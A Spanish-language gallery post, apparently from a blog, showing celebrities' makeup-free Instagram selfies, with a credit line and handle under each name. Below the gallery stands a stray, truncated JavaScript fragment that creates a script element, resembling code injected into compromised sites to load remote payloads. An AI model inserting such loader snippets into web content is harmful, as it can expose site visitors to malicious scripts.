#NoMakeupSelfie

Las celebridades muestran su piel al natural en Instagram.

La foto favorita de las celebres.

beyonce

Beyoncé / Instagram @Beyonce

aliciakeys

Alicia Keys  / Instagram @aliciakeys

Kylie Jenner

Kylie Jenner / Instagram @kyliejenner

cameron diaz

Cameron Diaz / Instagram @camerondiaz

kim kardashian

Kim Kardashian / Instagram @kimkardashian

lady gaga

Lady Gaga / Instagram @ladygaga

salma hayek

Salma Hayek / Instagram @salmahayek

selena gomez

Selena Gomez / Instagram @selenagomez

sofia vergara

Sofia Vergara / Instagram @sofiavergara

zoe

Zoe Kravitz / Instagram @zoeisabellakravitz

var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado